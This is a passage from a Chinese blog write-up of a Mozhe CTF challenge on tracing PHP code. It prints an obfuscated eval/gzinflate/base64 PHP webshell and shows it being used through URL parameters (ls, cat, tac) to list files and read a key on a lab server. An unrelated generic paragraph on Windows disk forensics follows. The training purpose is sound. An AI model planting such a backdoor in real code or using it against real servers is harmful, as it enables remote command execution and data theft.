墨者PHP代码分析溯源(第4题)题解

首先打开页面,有个提示,而且还有段代码
在这里插入图片描述
仔细看下这段代码

<?php
eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&)));
?>

能看出来首先是一段字符进行了解码,通过末尾的等于能看出来这是一段base64的解码,然后再使用前面的gzinflate函数执行了一次。gzinflate函数通过查询看是对数据进行了压缩,那么这段代码的含义就是对后面的字符串先解密然后压缩。我们直接对eval里面的内容输出一下看看
在这里插入图片描述
执行错误,一定是哪里出了问题,看下报错信息,说是’&‘的问题,理论上对字符串进行解密的话,应该是’才对,我们把&换成’再运行一下
在这里插入图片描述
成了,能看到这个加密的内容是’echo $_REQUEST[a];; ?>’。这不就是一个木马,我们赋值给a试试,看下有哪些文件,访问以下地址

http://219.153.49.228:42638/f.php?a=ls

在这里插入图片描述
好家伙,能看到key,我们直接读取试试

http://219.153.49.228:42638/f.php?a=cat key_213872772518460.php

发现无显示
在这里插入图片描述
换其他的读取命令试试,head tail more都不行,最后tac是可以的,

http://219.153.49.228:42638/f.php?a=tac%20key_213872772518460.php

在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院的Windows硬盘文件分析取证是一种通过对电脑硬盘上的文件进行分析来获取相关信息的技术手段。当涉及到犯罪调查时,这项技术可以帮助警方揭示犯罪嫌疑人的行为轨迹和证据。 在对犯罪嫌疑人所使用的计算机进行分析取证时,我们首先需要新建一个用户名。新建用户名的目的是为了保护我们操作的隐私和安全,以免意外地影响现有的用户设置或对系统产生不可逆的影响。这个新建的用户名仅用于分析取证过程。 一旦新建了用户名,我们可以开始进行分析取证工作。首先,我们会使用专业的取证软件对硬盘进行扫描,以找到潜在的关键文件和目录。通过恢复已删除的文件和检测隐藏的文件,我们可以获取更全面的信息。 接着,我们会对文件进行深入的分析。通过文件的创建时间、修改时间、访问记录等元数据信息,我们可以了解文件的活动轨迹。此外,我们还会查找关键词、犯罪工具、恶意软件等可能存在的证据。 在整个过程中,需要确保对取证工作的记录和操作都能被完整地保存下来,以确保后续的法律程序和证据呈现的可靠性。 综上所述,墨者学院的Windows硬盘文件分析取证可以帮助调查人员揭示犯罪嫌疑人的行为痕迹和相关证据,而新建的用户名则是为了保护我们操作的隐私和安全。通过有效的电脑取证工作,我们能够为正义的伸张提供有力的证据支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值